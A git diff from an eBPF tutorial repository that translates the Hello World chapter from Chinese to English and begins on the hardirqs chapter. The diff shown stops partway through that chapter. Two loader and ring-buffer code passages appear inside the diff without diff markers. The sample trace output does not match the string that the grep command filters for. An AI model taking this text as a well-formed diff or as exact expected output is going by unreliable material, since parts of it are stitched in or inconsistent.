+- GitHub Actions for automating the build, test, and release processes.
+- All dependencies required for eBPF development.

-> 通过将现有仓库设置为模板,您和其他人可以快速生成具有相同基础结构的新仓库,从而省去了手动创建和配置的繁琐过程。借助 GitHub 模板仓库,开发者可以专注于项目的核心功能和逻辑,而无需为基础设置和结构浪费时间。更多关于模板仓库的信息,请参阅官方文档:
+> By setting an existing repository as a template, you and others can quickly generate new repositories with the same underlying structure, eliminating the tedious process of manual creation and configuration. With GitHub template repositories, developers can focus on the core functionality and logic of their projects without wasting time on setup and structure. For more information about template repositories, please refer to the official documentation:

-## 总结
+## Summary

-eBPF 程序的开发和使用流程可以概括为如下几个步骤:
+The development and usage process of eBPF programs can be summarized in the following steps:

-- 定义 eBPF 程序的接口和类型:这包括定义 eBPF 程序的接口函数,定义和实现 eBPF 内核映射(maps)和共享内存(perf events),以及定义和使用 eBPF 内核帮助函数(helpers)。
-- 编写 eBPF 程序的代码:这包括编写 eBPF 程序的主要逻辑,实现 eBPF 内核映射的读写操作,以及使用 eBPF 内核帮助函数。
-- 编译 eBPF 程序:这包括使用 eBPF 编译器(例如 clang)将 eBPF 程序代码编译为 eBPF 字节码,并生成可执行的 eBPF 内核模块。ecc 本质上也是调用 clang 编译器来编译 eBPF 程序。
-- 加载 eBPF 程序到内核:这包括将编译好的 eBPF 内核模块加载到 Linux 内核中,并将 eBPF 程序附加到指定的内核事件上。
-- 使用 eBPF 程序:这包括监测 eBPF 程序的运行情况,并使用 eBPF 内核映射和共享内存进行数据交换和共享。
-- 在实际开发中,还可能需要进行其他的步骤,例如配置编译和加载参数,管理 eBPF 内核模块和内核映射,以及使用其他高级功能等。
+- Define the interface and types of eBPF programs: This includes defining the interface functions of eBPF programs, defining and implementing eBPF kernel maps and shared memory (perf events), and defining and using eBPF kernel helper functions.
+- Write the code for eBPF programs: This includes writing the main logic of the eBPF program, implementing read and write operations on eBPF kernel maps, and using eBPF kernel helper functions.
+- Compile the eBPF program: This includes using an eBPF compiler (such as clang) to compile the eBPF program code into eBPF bytecode and generate an executable eBPF kernel module. ecc essentially calls the clang compiler to compile eBPF programs.
+- Load the eBPF program into the kernel: This includes loading the compiled eBPF kernel module into the Linux kernel and attaching the eBPF program to the specified kernel events.
+- Use the eBPF program: This includes monitoring the execution of the eBPF program and exchanging and sharing data using eBPF kernel maps and shared memory.
+- In practical development, there may be additional steps such as configuring compilation and loading parameters, managing eBPF kernel modules and kernel maps, and using other advanced features.
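To make the compile/load/attach steps above concrete, here is a minimal user-space loader sketch. It is hypothetical rather than part of this tutorial's code: it assumes the kernel program has been compiled to `minimal.bpf.o` and that a skeleton header was generated with `bpftool gen skeleton minimal.bpf.o > minimal.skel.h`, which is the usual libbpf workflow.

```c
// Hypothetical libbpf skeleton loader for the minimal.bpf.c example above.
// Assumes: bpftool gen skeleton minimal.bpf.o > minimal.skel.h
#include <stdio.h>
#include <unistd.h>
#include "minimal.skel.h"

int main(void)
{
    struct minimal_bpf *skel;
    int err;

    skel = minimal_bpf__open();        /* parse the embedded BPF object */
    if (!skel) {
        fprintf(stderr, "failed to open BPF skeleton\n");
        return 1;
    }

    err = minimal_bpf__load(skel);     /* create maps, load and verify programs */
    if (err)
        goto cleanup;

    err = minimal_bpf__attach(skel);   /* attach handle_tp to its tracepoint */
    if (err)
        goto cleanup;

    printf("Attached; see /sys/kernel/debug/tracing/trace_pipe\n");
    while (1)
        sleep(1);                      /* keep the program attached */

cleanup:
    minimal_bpf__destroy(skel);        /* detach and unload everything */
    return err != 0;
}
```

The `minimal_bpf__open/load/attach/destroy` calls correspond one-to-one to the load, attach, and unload steps in the list above; tools like eunomia-bpf's ecli wrap this same sequence for you.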
-需要注意的是,BPF 程序的执行是在内核空间进行的,因此需要使用特殊的工具和技术来编写、编译和调试 BPF 程序。eunomia-bpf 是一个开源的 BPF 编译器和工具包,它可以帮助开发者快速和简单地编写和运行 BPF 程序。 +It should be noted that the execution of BPF programs occurs in the kernel space, so special tools and techniques are needed to write, compile, and debug BPF programs. eunomia-bpf is an open-source BPF compiler and toolkit that can help developers write and run BPF programs quickly and easily. -您还可以访问我们的教程代码仓库 以获取更多示例和完整的教程,全部内容均已开源。我们会继续分享更多有关 eBPF 开发实践的内容,帮助您更好地理解和掌握 eBPF 技术。 - -> 原文地址: 转载请注明出处。 +You can also visit our tutorial code repository or website or website for more examples and complete tutorials, all of which are open-source. We will continue to share more about eBPF development practices to help you better understand and master eBPF technology. diff --git a/src/1-helloworld/README.zh.md b/src/1-helloworld/README.zh.md new file mode 100644 index 0000000..0d5e018 --- /dev/null +++ b/src/1-helloworld/README.zh.md @@ -0,0 +1,197 @@ +# eBPF 入门开发实践教程一:Hello World,基本框架和开发流程 + +在本篇博客中,我们将深入探讨eBPF(Extended Berkeley Packet Filter)的基本框架和开发流程。eBPF是一种在Linux内核上运行的强大网络和性能分析工具,它为开发者提供了在内核运行时动态加载、更新和运行用户定义代码的能力。这使得开发者可以实现高效、安全的内核级别的网络监控、性能分析和故障排查等功能。 + +本文是eBPF入门开发实践教程的第二篇,我们将重点关注如何编写一个简单的eBPF程序,并通过实际例子演示整个开发流程。在阅读本教程之前,建议您先学习第一篇教程,以便对eBPF的基本概念有个大致的了解。 + +在开发eBPF程序时,有多种开发框架可供选择,如 BCC(BPF Compiler Collection)libbpf、cilium/ebpf、eunomia-bpf 等。虽然不同工具的特点各异,但它们的基本开发流程大致相同。在接下来的内容中,我们将深入了解这些流程,并以 Hello World 程序为例,带领读者逐步掌握eBPF开发的基本技巧。 + +本教程将帮助您了解eBPF程序的基本结构、编译和加载过程、用户空间与内核空间的交互方式以及调试与优化技巧。通过学习本教程,您将掌握eBPF开发的基本知识,并为后续进一步学习和实践奠定坚实的基础。 + +## eBPF开发环境准备与基本开发流程 + +在开始编写eBPF程序之前,我们需要准备一个合适的开发环境,并了解eBPF程序的基本开发流程。本部分将详细介绍这些内容。 + +### 安装必要的软件和工具 + +要开发eBPF程序,您需要安装以下软件和工具: + +- Linux 内核:由于eBPF是内核技术,因此您需要具备较新版本的Linux内核(至少 4.8 及以上版本,建议至少在 5.15 以上),以支持eBPF功能。 + - 建议使用最新的 Ubuntu 版本(例如 Ubuntu 23.10)以获得最佳的学习体验,较旧的内核 eBPF 功能支持可能相对不全。 +- LLVM 和 Clang:这些工具用于编译eBPF程序。安装最新版本的LLVM和Clang可以确保您获得最佳的eBPF支持。 + +eBPF 程序主要由两部分构成:内核态部分和用户态部分。内核态部分包含 eBPF 程序的实际逻辑,用户态部分负责加载、运行和监控内核态程序。 + +当您选择了合适的开发框架后,如BCC(BPF Compiler Collection)、libbpf、cilium/ebpf或eunomia-bpf等,您可以开始进行用户态和内核态程序的开发。以BCC工具为例,我们将介绍eBPF程序的基本开发流程: + +1. 安装BCC工具:根据您的Linux发行版,按照BCC官方文档的指南安装BCC工具和相关依赖。 +2. 编写eBPF程序(C语言):使用C语言编写一个简单的eBPF程序,例如Hello World程序。该程序可以在内核空间执行并完成特定任务,如统计网络数据包数量。 +3. 编写用户态程序(Python或C等):使用Python、C等语言编写用户态程序,用于加载、运行eBPF程序以及与之交互。在这个程序中,您需要使用BCC提供的API来加载和操作内核态的eBPF程序。 +4. 编译eBPF程序:使用BCC工具,将C语言编写的eBPF程序编译成内核可以执行的字节码。BCC会在运行时动态从源码编译eBPF程序。 +5. 加载并运行eBPF程序:在用户态程序中,使用BCC提供的API加载编译好的eBPF程序到内核空间,然后运行该程序。 +6. 与eBPF程序交互:用户态程序通过BCC提供的API与eBPF程序交互,实现数据收集、分析和展示等功能。例如,您可以使用BCC API读取eBPF程序中的map数据,以获取网络数据包统计信息。 +7. 卸载eBPF程序:当不再需要eBPF程序时,用户态程序应使用BCC API将其从内核空间卸载。 +8. 
调试与优化:使用 bpftool 等工具进行eBPF程序的调试和优化,提高程序性能和稳定性。 + +通过以上流程,您可以使用BCC工具开发、编译、运行和调试eBPF程序。请注意,其他框架(如libbpf、cilium/ebpf和eunomia-bpf)的开发流程大致相似但略有不同,因此在选择框架时,请参考相应的官方文档和示例。 + +通过这个过程,你可以开发出一个能够在内核中运行的 eBPF 程序。eunomia-bpf 是一个开源的 eBPF 动态加载运行时和开发工具链,它的目的是简化 eBPF 程序的开发、构建、分发、运行。它基于 libbpf 的 CO-RE 轻量级开发框架,支持通过用户态 WASM 虚拟机控制 eBPF 程序的加载和执行,并将预编译的 eBPF 程序打包为通用的 JSON 或 WASM 模块进行分发。我们会使用 eunomia-bpf 进行演示。 + +## 下载安装 eunomia-bpf 开发工具 + +可以通过以下步骤下载和安装 eunomia-bpf: + +下载 ecli 工具,用于运行 eBPF 程序: + +```console +$ wget https://aka.pw/bpf-ecli -O ecli && chmod +x ./ecli +$ ./ecli -h +Usage: ecli [--help] [--version] [--json] [--no-cache] url-and-args +``` + +下载编译器工具链,用于将 eBPF 内核代码编译为 config 文件或 WASM 模块: + +```console +$ wget https://github.com/eunomia-bpf/eunomia-bpf/releases/latest/download/ecc && chmod +x ./ecc +$ ./ecc -h +eunomia-bpf compiler +Usage: ecc [OPTIONS] [EXPORT_EVENT_HEADER] +``` + +注:假如在 aarch64 平台上,请从 release 下载 [ecc-aarch64](https://github.com/eunomia-bpf/eunomia-bpf/releases/latest/download/ecc-aarch64) 和 [ecli-aarch64](https://github.com/eunomia-bpf/eunomia-bpf/releases/latest/download/ecli-aarch64). + +也可以使用 docker 镜像进行编译: + +```console +$ docker run -it -v `pwd`/:/src/ ghcr.io/eunomia-bpf/ecc-`uname -m`:latest # 使用 docker 进行编译。`pwd` 应该包含 *.bpf.c 文件和 *.h 文件。 +export PATH=PATH:~/.eunomia/bin +Compiling bpf object... +Packing ebpf object and config into /src/package.json... +``` + +## Hello World - minimal eBPF program + +我们会先从一个简单的 eBPF 程序开始,它会在内核中打印一条消息。我们会使用 eunomia-bpf 的编译器工具链将其编译为 bpf 字节码文件,然后使用 ecli 工具加载并运行该程序。作为示例,我们可以暂时省略用户态程序的部分。 + +```c +/* SPDX-License-Identifier: (LGPL-2.1 OR BSD-2-Clause) */ +#define BPF_NO_GLOBAL_DATA +#include +#include +#include + +typedef unsigned int u32; +typedef int pid_t; +const pid_t pid_filter = 0; + +char LICENSE[] SEC("license") = "Dual BSD/GPL"; + +SEC("tp/syscalls/sys_enter_write") +int handle_tp(void *ctx) +{ + pid_t pid = bpf_get_current_pid_tgid() >> 32; + if (pid_filter && pid != pid_filter) + return 0; + bpf_printk("BPF triggered sys_enter_write from PID %d.\n", pid); + return 0; +} +``` + +这段程序通过定义一个 handle_tp 函数并使用 SEC 宏把它附加到 sys_enter_write tracepoint(即在进入 write 系统调用时执行)。该函数通过使用 bpf_get_current_pid_tgid 和 bpf_printk 函数获取调用 write 系统调用的进程 ID,并在内核日志中打印出来。 + +- `bpf_printk()`: 一种将信息输出到trace_pipe(/sys/kernel/debug/tracing/trace_pipe)简单机制。 在一些简单用例中这样使用没有问题, but它也有一些限制:最多3 参数; 第一个参数必须是%s(即字符串);同时trace_pipe在内核中全局共享,其他并行使用trace_pipe的程序有可能会将 trace_pipe 的输出扰乱。 一个更好的方式是通过 BPF_PERF_OUTPUT(), 稍后将会讲到。 +- `void *ctx`:ctx本来是具体类型的参数, 但是由于我们这里没有使用这个参数,因此就将其写成void *类型。 +- `return 0`;:必须这样,返回0 (如果要知道why, 参考 #139 )。 + +要编译和运行这段程序,可以使用 ecc 工具和 ecli 命令。首先在 Ubuntu/Debian 上,执行以下命令: + +```shell +sudo apt install clang llvm +``` + +使用 ecc 编译程序: + +```console +$ ./ecc minimal.bpf.c +Compiling bpf object... +Packing ebpf object and config into package.json... +``` + +或使用 docker 镜像进行编译: + +```shell +docker run -it -v `pwd`/:/src/ ghcr.io/eunomia-bpf/ecc-`uname -m`:latest +``` + +然后使用 ecli 运行编译后的程序: + +```console +$ sudo ./ecli run package.json +Running eBPF program... +``` + +运行这段程序后,可以通过查看 /sys/kernel/debug/tracing/trace_pipe 文件来查看 eBPF 程序的输出: + +```console +$ sudo cat /sys/kernel/debug/tracing/trace_pipe | grep "BPF triggered sys_enter_write" + <...>-3840345 [010] d... 3220701.101143: bpf_trace_printk: write system call from PID 3840345. + <...>-3840345 [010] d... 3220701.101143: bpf_trace_printk: write system call from PID 3840345. 
+``` + +按 Ctrl+C 停止 ecli 进程之后,可以看到对应的输出也停止。 + +注意:如果正在使用的 Linux 发行版(例如 Ubuntu )默认情况下没有启用跟踪子系统可能看不到任何输出,使用以下指令打开这个功能: + +```console +$ sudo su +# echo 1 > /sys/kernel/debug/tracing/tracing_on +``` + +## eBPF 程序的基本框架 + +如上所述, eBPF 程序的基本框架包括: + +- 包含头文件:需要包含 等头文件。 +- 定义许可证:需要定义许可证,通常使用 "Dual BSD/GPL"。 +- 定义 BPF 函数:需要定义一个 BPF 函数,例如其名称为 handle_tp,其参数为 void *ctx,返回值为 int。通常用 C 语言编写。 +- 使用 BPF 助手函数:在例如 BPF 函数中,可以使用 BPF 助手函数 bpf_get_current_pid_tgid() 和 bpf_printk()。 +- 返回值 + +## tracepoints + +跟踪点(tracepoints)是内核静态插桩技术,在技术上只是放置在内核源代码中的跟踪函数,实际上就是在源码中插入的一些带有控制条件的探测点,这些探测点允许事后再添加处理函数。比如在内核中,最常见的静态跟踪方法就是 printk,即输出日志。又比如:在系统调用、调度程序事件、文件系统操作和磁盘 I/O 的开始和结束时都有跟踪点。跟踪点于 2009 年在 Linux 2.6.32 版本中首次提供。跟踪点是一种稳定的 API,数量有限。 + +## GitHub 模板:轻松构建 eBPF 项目和开发环境 + +面对创建一个 eBPF 项目,您是否对如何开始搭建环境以及选择编程语言感到困惑?别担心,我们为您准备了一系列 GitHub 模板,以便您快速启动一个全新的eBPF项目。只需在GitHub上点击 `Use this template` 按钮,即可开始使用。 + +- :基于C语言和 libbpf 框架的eBPF项目模板 +- :基于Go语言和cilium/ebpf框架的eBPF项目模板 +- :基于Rust语言和libbpf-rs框架的eBPF项目模板 +- :基于C语言和eunomia-bpf框架的eBPF项目模板 + +这些启动模板包含以下功能: + +- 一个 Makefile,让您可以一键构建项目 +- 一个 Dockerfile,用于为您的 eBPF 项目自动创建一个容器化环境并发布到 Github Packages +- GitHub Actions,用于自动化构建、测试和发布流程 +- eBPF 开发所需的所有依赖项 + +> 通过将现有仓库设置为模板,您和其他人可以快速生成具有相同基础结构的新仓库,从而省去了手动创建和配置的繁琐过程。借助 GitHub 模板仓库,开发者可以专注于项目的核心功能和逻辑,而无需为基础设置和结构浪费时间。更多关于模板仓库的信息,请参阅官方文档: + +## 总结 + +eBPF 程序的开发和使用流程可以概括为如下几个步骤: + +- 定义 eBPF 程序的接口和类型:这包括定义 eBPF 程序的接口函数,定义和实现 eBPF 内核映射(maps)和共享内存(perf events),以及定义和使用 eBPF 内核帮助函数(helpers)。 +- 编写 eBPF 程序的代码:这包括编写 eBPF 程序的主要逻辑,实现 eBPF 内核映射的读写操作,以及使用 eBPF 内核帮助函数。 +- 编译 eBPF 程序:这包括使用 eBPF 编译器(例如 clang)将 eBPF 程序代码编译为 eBPF 字节码,并生成可执行的 eBPF 内核模块。ecc 本质上也是调用 clang 编译器来编译 eBPF 程序。 +- 加载 eBPF 程序到内核:这包括将编译好的 eBPF 内核模块加载到 Linux 内核中,并将 eBPF 程序附加到指定的内核事件上。 +- 使用 eBPF 程序:这包括监测 eBPF 程序的运行情况,并使用 eBPF 内核映射和共享内存进行数据交换和共享。 +- 在实际开发中,还可能需要进行其他的步骤,例如配置编译和加载参数,管理 eBPF 内核模块和内核映射,以及使用其他高级功能等。 + +需要注意的是,BPF 程序的执行是在内核空间进行的,因此需要使用特殊的工具和技术来编写、编译和调试 BPF 程序。eunomia-bpf 是一个开源的 BPF 编译器和工具包,它可以帮助开发者快速和简单地编写和运行 BPF 程序。 + +您还可以访问我们的教程代码仓库 以获取更多示例和完整的教程,全部内容均已开源。我们会继续分享更多有关 eBPF 开发实践的内容,帮助您更好地理解和掌握 eBPF 技术。 + +> 原文地址: 转载请注明出处。 diff --git a/src/1-helloworld/README_en.md b/src/1-helloworld/README_en.md deleted file mode 100644 index a94181a..0000000 --- a/src/1-helloworld/README_en.md +++ /dev/null @@ -1,195 +0,0 @@ -# eBPF Tutorial by Example 1: Hello World, Framework and Development - -In this blog post, we will delve into the basic framework and development process of eBPF (Extended Berkeley Packet Filter). eBPF is a powerful network and performance analysis tool that runs on the Linux kernel, providing developers with the ability to dynamically load, update, and run user-defined code at kernel runtime. This enables developers to implement efficient, secure kernel-level network monitoring, performance analysis, and troubleshooting functionalities. - -This article is the second part of the eBPF Tutorial by Example, where we will focus on how to write a simple eBPF program and demonstrate the entire development process through practical examples. Before reading this tutorial, it is recommended that you first learn the concepts of eBPF by studying the first tutorial. - -When developing eBPF programs, there are multiple development frameworks to choose from, such as BCC (BPF Compiler Collection) libbpf, cilium/ebpf, eunomia-bpf, etc. Although these tools have different characteristics, their basic development process is similar. 
In the following content, we will delve into these processes and use the Hello World program as an example to guide readers in mastering the basic skills of eBPF development. - -This tutorial will help you understand the basic structure of eBPF programs, the compilation and loading process, the interaction between user space and kernel space, as well as debugging and optimization techniques. By studying this tutorial, you will master the basic knowledge of eBPF development and lay a solid foundation for further learning and practice. - -## Preparation of eBPF Development Environment and Basic Development Process - -Before starting to write eBPF programs, we need to prepare a suitable development environment and understand the basic development process of eBPF programs. This section will provide a detailed introduction to these subjects. - -### Installing the necessary software and tools - -To develop eBPF programs, you need to install the following software and tools: - -- Linux kernel: Since eBPF is a kernel technology, you need to have a relatively new version of the Linux kernel (minimum version 4.8 and above, suggested version is 5.15+ or 6.2+) to support eBPF functionality. - - If possible, install a new version of Ubuntu (e.g. 23.10) would be better. -- LLVM and Clang: These tools are used to compile eBPF programs. Installing the latest version of LLVM and Clang ensures that you get the best eBPF support. - -An eBPF program consists of two main parts: the kernel space part and the user space part. The kernel space part contains the actual logic of the eBPF program, while the user space part is responsible for loading, running, and monitoring the kernel space program. - -Once you have chosen a suitable development framework, such as BCC (BPF Compiler Collection), libbpf, cilium/ebpf, or eunomia-bpf, you can begin developing the user space and kernel space programs. Taking the BCC tool as an example, we will introduce the basic development process of eBPF programs: - -1. Installing the BCC tool: Depending on your Linux distribution, follow the guidelines in the BCC documentation to install the BCC tool and its dependencies. -2. Writing an eBPF program (C language): Use the C language to write a simple eBPF program, such as the Hello World program. This program can be executed in kernel space and perform specific tasks, such as counting network packets. -3. Writing a user space program (Python or C, etc.): Use languages like Python or C to write a user space program that is responsible for loading, running, and interacting with the eBPF program. In this program, you need to use the API provided by BCC to load and manipulate the kernel space eBPF program. -4. Compiling the eBPF program: Use the BCC tool to compile the eBPF program written in C language into bytecode that can be executed by the kernel. BCC dynamically compiles the eBPF program from source code at runtime. -5. Loading and running the eBPF program: In the user space program, use the API provided by BCC to load the compiled eBPF program into kernel space and then run it. -6. Interacting with the eBPF program: The user space program interacts with the eBPF program through the API provided by BCC, implementing data collection, analysis, and display functions. For example, you can use the BCC API to read map data in the eBPF program to obtain network packet statistics. -7. Unloading the eBPF program: When the eBPF program is no longer needed, the user space program should unload it from the kernel space using the BCC API. -8. 
Debugging and optimization: Use tools like bpftool to debug and optimize eBPF programs, improving program performance and stability. - -Through the above process, you can develop, compile, run, and debug eBPF programs using the BCC tool. Note that the development process of other frameworks, such as libbpf, cilium/ebpf, and eunomia-bpf, is similar but slightly different. Therefore, when choosing a framework, please refer to the respective official documentation and examples. - -By following this process, you can develop an eBPF program that runs in the kernel. eunomia-bpf is an open-source eBPF dynamic loading runtime and development toolchain. It aims to simplify the development, building, distribution, and running of eBPF programs. It is based on the libbpf CO-RE lightweight development framework, supports loading and executing eBPF programs through a user space WebAssembly (WASM) virtual machine, and packages precompiled eBPF programs into universal JSON or WASM modules for distribution. We will use eunomia-bpf for demonstration purposes. - -## Download and Install eunomia-bpf Development Tools - -You can download and install eunomia-bpf using the following steps: - -Download the ecli tool for running eBPF programs: - -```console -$ wget https://aka.pw/bpf-ecli -O ecli && chmod +x ./ecli -$ ./ecli -h -Usage: ecli [--help] [--version] [--json] [--no-cache] url-and-args -``` - -Download the compiler toolchain for compiling eBPF kernel code into config files or WASM modules: - -```console -$ wget https://github.com/eunomia-bpf/eunomia-bpf/releases/latest/download/ecc && chmod +x ./ecc -$ ./ecc -h -eunomia-bpf compiler -Usage: ecc [OPTIONS] [EXPORT_EVENT_HEADER] -.... -``` - -Note: If you are on the aarch64 platform, please use the [ecc-aarch64](https://github.com/eunomia-bpf/eunomia-bpf/releases/latest/download/ecc-aarch64) and [ecli-aarch64](https://github.com/eunomia-bpf/eunomia-bpf/releases/latest/download/ecli-aarch64). - -You can also compile using the docker image: - -```console -$ docker run -it -v `pwd`/:/src/ ghcr.io/eunomia-bpf/ecc-`uname -m`:latest # Compile using docker. `pwd` should contain *.bpf.c files and *.h files. -export PATH=PATH:~/.eunomia/bin -Compiling bpf object... -Packing ebpf object and config into /src/package.json... -``` - -## Hello World - minimal eBPF program - -We will start with a simple eBPF program that prints a message in the kernel. We will use the eunomia-bpf compiler toolchain to compile it into a BPF bytecode file, and then load and run the program using the ecli tool. For the sake of the example, we can temporarily disregard the user space program. - -```c -/* SPDX-License-Identifier: (LGPL-2.1 OR BSD-2-Clause) */ -#define BPF_NO_GLOBAL_DATA -#include -#include -#include - -typedef unsigned int u32; -typedef int pid_t; -const pid_t pid_filter = 0; - -char LICENSE[] SEC("license") = "Dual BSD/GPL"; - -SEC("tp/syscalls/sys_enter_write") -int handle_tp(void *ctx) -{ - pid_t pid = bpf_get_current_pid_tgid() >> 32; - if (pid_filter && pid != pid_filter) - return 0; - bpf_printk("BPF triggered sys_enter_write from PID %d.\n", pid); - return 0; -} -``` - -This program defines a handle_tp function and attaches it to the sys_enter_write tracepoint using the SEC macro (i.e., it is executed when the write system call is entered). The function retrieves the process ID of the write system call invocation using the bpf_get_current_pid_tgid and bpf_printk functions, and prints it in the kernel log. 
- -- `bpf_trace_printk()`: A simple mechanism to output information to the trace_pipe (/sys/kernel/debug/tracing/trace_pipe). This is fine for simple use cases, but it has limitations: a maximum of 3 parameters; the first parameter must be %s (i.e., a string); and the trace_pipe is globally shared in the kernel, so other programs using the trace_pipe concurrently might disrupt its output. A better approach is to use BPF_PERF_OUTPUT(), which will be discussed later. -- `void *ctx`: ctx is originally a parameter of a specific type, but since it is not used here, it is written as void *. -- `return 0;`: This is necessary, returning 0 (to know why, refer to #139 ). - -To compile and run this program, you can use the ecc tool and ecli command. First, on Ubuntu/Debian, execute the following command: - -```shell -sudo apt install clang llvm -``` - -Compile the program using ecc: - -```console -$ ./ecc minimal.bpf.c -Compiling bpf object... -Packing ebpf object and config into package.json... -``` - -Or compile using a docker image: - -```shell -docker run -it -v `pwd`/:/src/ ghcr.io/eunomia-bpf/ecc-`uname -m`:latest -``` - -Then run the compiled program using ecli: - -```console -$ sudo ./ecli run package.json -Running eBPF program... -``` - -After running this program, you can view the output of the eBPF program by checking the /sys/kernel/debug/tracing/trace_pipe file: - -```console -$ sudo cat /sys/kernel/debug/tracing/trace_pipe | grep "BPF triggered sys_enter_write" - <...>-3840345 [010] d... 3220701.101143: bpf_trace_printk: write system call from PID 3840345. - <...>-3840345 [010] d... 3220701.101143: bpf_trace_printk: write system call from PID 3840345. -``` - -Once you stop the ecli process by pressing Ctrl+C, the corresponding output will also stop. - -Note: If your Linux distribution (e.g. Ubuntu) does not have the tracing subsystem enabled by default, you may not see any output. Use the following command to enable this feature: - -```console -$ sudo su -# echo 1 > /sys/kernel/debug/tracing/tracing_on -``` - -## Basic Framework of eBPF Program - -As mentioned above, the basic framework of an eBPF program includes: - -- Including header files: You need to include and header files, among others. -- Defining a license: You need to define a license, typically using "Dual BSD/GPL". -- Defining a BPF function: You need to define a BPF function, for example, named handle_tp, which takes void *ctx as a parameter and returns int. This is usually written in the C language. -- Using BPF helper functions: In the BPF function, you can use BPF helper functions such as bpf_get_current_pid_tgid() and bpf_printk(). -- Return value - -## Tracepoints - -Tracepoints are a kernel static instrumentation technique, technically just trace functions placed in the kernel source code, which are essentially probe points with control conditions inserted into the source code, allowing post-processing with additional processing functions. For example, the most common static tracing method in the kernel is printk, which outputs log messages. For example, there are tracepoints at the start and end of system calls, scheduler events, file system operations, and disk I/O. Tracepoints were first introduced in Linux version 2.6.32 in 2009. Tracepoints are a stable API and their number is limited. - -## GitHub Templates: Build eBPF Projects and Development Environments Easily - -When faced with creating an eBPF project, are you confused about how to set up the environment and choose a programming language? 
Don't worry, we have prepared a series of GitHub templates to help you quickly start a brand new eBPF project. Just click the `Use this template` button on GitHub to get started. - -- : eBPF project template based on the C language and libbpf framework. -- : eBPF project template based on the Go language and cilium/ebpf framework. -- : eBPF project template based on the Rust language and libbpf-rs framework. -- : eBPF project template based on the C language and eunomia-bpf framework. - -These starter templates include the following features: - -- A Makefile for building the project with one command. -- A Dockerfile for automatically creating a containerized environment for your eBPF project and publishing it to Github Packages.- GitHub Actions, used for automating build, test, and release processes -- All dependencies required for eBPF development - -> By setting an existing repository as a template, you and others can quickly generate new repositories with the same underlying structure, eliminating the tedious process of manual creation and configuration. With GitHub template repositories, developers can focus on the core functionality and logic of their projects without wasting time on setup and structure. For more information about template repositories, please refer to the official documentation: - -## Summary - -The development and usage process of eBPF programs can be summarized in the following steps: - -- Define the interface and types of eBPF programs: This includes defining the interface functions of eBPF programs, defining and implementing eBPF kernel maps and shared memory (perf events), and defining and using eBPF kernel helper functions. -- Write the code for eBPF programs: This includes writing the main logic of the eBPF program, implementing read and write operations on eBPF kernel maps, and using eBPF kernel helper functions. -- Compile the eBPF program: This includes using an eBPF compiler (such as clang) to compile the eBPF program code into eBPF bytecode and generate an executable eBPF kernel module. ecc essentially calls the clang compiler to compile eBPF programs. -- Load the eBPF program into the kernel: This includes loading the compiled eBPF kernel module into the Linux kernel and attaching the eBPF program to the specified kernel events. -- Use the eBPF program: This includes monitoring the execution of the eBPF program and exchanging and sharing data using eBPF kernel maps and shared memory. -- In practical development, there may be additional steps such as configuring compilation and loading parameters, managing eBPF kernel modules and kernel maps, and using other advanced features. - -It should be noted that the execution of BPF programs occurs in the kernel space, so special tools and techniques are needed to write, compile, and debug BPF programs. eunomia-bpf is an open-source BPF compiler and toolkit that can help developers write and run BPF programs quickly and easily. - -You can also visit our tutorial code repository or website or website for more examples and complete tutorials, all of which are open-source. We will continue to share more about eBPF development practices to help you better understand and master eBPF technology. 
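As the notes above point out, `bpf_printk()` writes to the globally shared trace_pipe, and a map-based channel such as BPF_PERF_OUTPUT() is preferable for real tools. As a hedged sketch of that idea, the variant below uses libbpf's BPF ring buffer (available on kernels 5.8+) instead; the `struct event` layout and the map name `rb` are our own choices, not part of the original example.

```c
// Hypothetical ring-buffer variant of the minimal example (not the
// tutorial's code). Requires a kernel with BPF_MAP_TYPE_RINGBUF (5.8+).
#include <linux/bpf.h>
#include <bpf/bpf_helpers.h>

struct event {
    int pid;
};

struct {
    __uint(type, BPF_MAP_TYPE_RINGBUF);
    __uint(max_entries, 256 * 1024);   /* 256 KiB ring buffer */
} rb SEC(".maps");

SEC("tp/syscalls/sys_enter_write")
int handle_tp(void *ctx)
{
    struct event *e;

    e = bpf_ringbuf_reserve(&rb, sizeof(*e), 0);
    if (!e)
        return 0;                      /* buffer full: drop this event */

    e->pid = bpf_get_current_pid_tgid() >> 32;
    bpf_ringbuf_submit(e, 0);
    return 0;
}

char LICENSE[] SEC("license") = "Dual BSD/GPL";
```

User space would then consume events with libbpf's `ring_buffer__new()` and `ring_buffer__poll()` instead of reading the shared trace_pipe, so concurrently running tools no longer interleave their output.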
diff --git a/src/10-hardirqs/README.md b/src/10-hardirqs/README.md index 33e8173..4de28a9 100644 --- a/src/10-hardirqs/README.md +++ b/src/10-hardirqs/README.md @@ -1,37 +1,37 @@ -# eBPF 入门开发实践教程十:在 eBPF 中使用 hardirqs 或 softirqs 捕获中断事件 +# eBPF Tutorial by Example 10: Capturing Interrupts with hardirqs or softirqs -eBPF (Extended Berkeley Packet Filter) 是 Linux 内核上的一个强大的网络和性能分析工具。它允许开发者在内核运行时动态加载、更新和运行用户定义的代码。 +eBPF (Extended Berkeley Packet Filter) is a powerful network and performance analysis tool on the Linux kernel. It allows developers to dynamically load, update, and run user-defined code at runtime in the kernel. -本文是 eBPF 入门开发实践教程的第十篇,在 eBPF 中使用 hardirqs 或 softirqs 捕获中断事件。 -hardirqs 和 softirqs 是 Linux 内核中两种不同类型的中断处理程序。它们用于处理硬件设备产生的中断请求,以及内核中的异步事件。在 eBPF 中,我们可以使用同名的 eBPF 工具 hardirqs 和 softirqs 来捕获和分析内核中与中断处理相关的信息。 +This article is the tenth part of the eBPF Tutorial by Example, focusing on capturing interrupt events using hardirqs or softirqs in eBPF. +hardirqs and softirqs are two different types of interrupt handlers in the Linux kernel. They are used to handle interrupt requests generated by hardware devices, as well as asynchronous events in the kernel. In eBPF, we can use the eBPF tools hardirqs and softirqs to capture and analyze information related to interrupt handling in the kernel. -## hardirqs 和 softirqs 是什么? +## What are hardirqs and softirqs? -hardirqs 是硬件中断处理程序。当硬件设备产生一个中断请求时,内核会将该请求映射到一个特定的中断向量,然后执行与之关联的硬件中断处理程序。硬件中断处理程序通常用于处理设备驱动程序中的事件,例如设备数据传输完成或设备错误。 +hardirqs are hardware interrupt handlers. When a hardware device generates an interrupt request, the kernel maps it to a specific interrupt vector and executes the associated hardware interrupt handler. Hardware interrupt handlers are commonly used to handle events in device drivers, such as completion of device data transfer or device errors. -softirqs 是软件中断处理程序。它们是内核中的一种底层异步事件处理机制,用于处理内核中的高优先级任务。softirqs 通常用于处理网络协议栈、磁盘子系统和其他内核组件中的事件。与硬件中断处理程序相比,软件中断处理程序具有更高的灵活性和可配置性。 +softirqs are 